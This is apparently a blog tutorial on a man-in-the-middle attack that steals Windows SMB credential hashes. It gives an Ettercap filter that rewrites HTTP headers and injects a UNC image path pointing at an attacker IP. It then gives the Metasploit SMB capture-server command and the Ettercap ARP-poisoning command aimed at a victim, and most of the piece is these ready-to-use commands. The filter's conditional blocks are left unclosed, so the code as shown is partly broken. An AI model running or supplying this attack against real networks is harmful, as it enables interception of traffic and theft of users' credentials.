Man-in-the-Middle SMB Hash Capture with Ettercap and Metasploit

Today, I’ll show you how to leverage that MitM position to alter the traffic from the website and steal a victim’s SMB credentials. I learned this attack from the SANS course, SEC660.

  1. Write an Ettercap filter (or just copy and adjust). This filter does a few things, explained in the comments below. After you write it you need to compile it. Use the command etterfilter -o [output_file_name].ef [input file_name].filter

Here is filter I use for this attack:

# Will find and replace Accept-Encoding with Accept-Nothing. We do not # want encoded traffic.
if (ip.proto == TCP && tcp.dst == 80) {
 if (search(, "Accept-Encoding")) {
 replace("Accept-Encoding", "Accept-Nothing!"); 
# note: replacement string is same length as original string
 msg("Replaced Accept-Encoding!\n");

# Will find and replace If-Modified-Since with If-Pacified-Since. We do # not want the victim to view cached content
if (ip.proto == TCP && tcp.dst == 80) {
 if (search(, "If-Modified-Since")) {
 replace("If-Modified-Since", "If-Pacified-Since"); 
# note: replacement string is same length as original string
 msg("Replaced If-Modified-Since\n");

# Will replace the <head> tag with
# <head> <img src=[attacker_ip]\\file.gif >. 
# We want to insert a UNC path into the rendered page 
# to force a SMB connection
if (ip.proto == TCP && tcp.src == 80) {
 replace("<head>", "<head> <img src=\"\\\\[attacker_IP]\\p.gif\">");
 msg("Replaced head with head and image\n");

Compile the filter with etterfilter -o smb_capture.ef smb_capture.filter

  1. Start metasploit and run the SMB capture server. This will create a metasploit listener on port 445 with a server challenge. When the client connects, metasploit will record the challenge and hash in a password format that JTR or Cain can read. I am using the JTR format.

msfconsole -x ‘use auxiliary/server/capture/smb; set johnpwfile /tmp/passfile; exploit;’

  1. Establish your MitM with Ettercap and your new filter:

Ettercap -TqM arp:remote -F smb_capture.ef /[victim]/ /[web_server]/

  1. Wait for your victim to browse to the web server. When the victim visits the web server, the Ettercap filter will intercept the HTTP traffic, replace the headers as well as the <head> tag. If you did everything correctly, you will see messages in the Ettercap terminal saying whatever messages you specified in your filter. You will also see the captured hash/challenge in metasploit and a file will be created with the hash and challenge that is ready to be fed into JTR.

Here is a video demo:

Leave a Reply

Your email address will not be published. Required fields are marked *